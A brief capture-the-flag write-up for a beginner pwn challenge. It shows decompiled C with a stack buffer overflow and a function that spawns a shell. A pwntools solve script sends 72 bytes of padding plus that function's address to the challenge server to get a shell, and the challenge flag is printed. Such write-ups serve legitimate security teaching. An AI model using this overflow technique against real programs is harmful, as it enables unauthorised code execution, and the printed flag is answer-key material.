Decompiling with ghidra shows 2 functions:

```c
void main(EVP_PKEY_CTX *param_1)

{
char buffer [64];

init(param_1);
puts("Would you like a flag?");
fgets(buffer,80,stdin);
system("cat fake_flag.txt");
return;
}

void win(void)

{
system("/bin/sh");
return;
}
```

Basic buffer overflow, 64+8 bytes of junk + address of win function, then get shell and print out flag.


Solve script:

```py
from pwn import *

r = remote("challs.n00bzunit3d.xyz", 35932)

r.sendline(b"A"*72 + p64(0x000000000040124a))

r.interactive()
```


Flag: `n00bz{PWN_1_Cl34r3d_n0w_0nt0_PWN_2!!!}`

Original writeup (https://jp-ch.gq/pwn/n00bzCTF-2023.html#pwn1).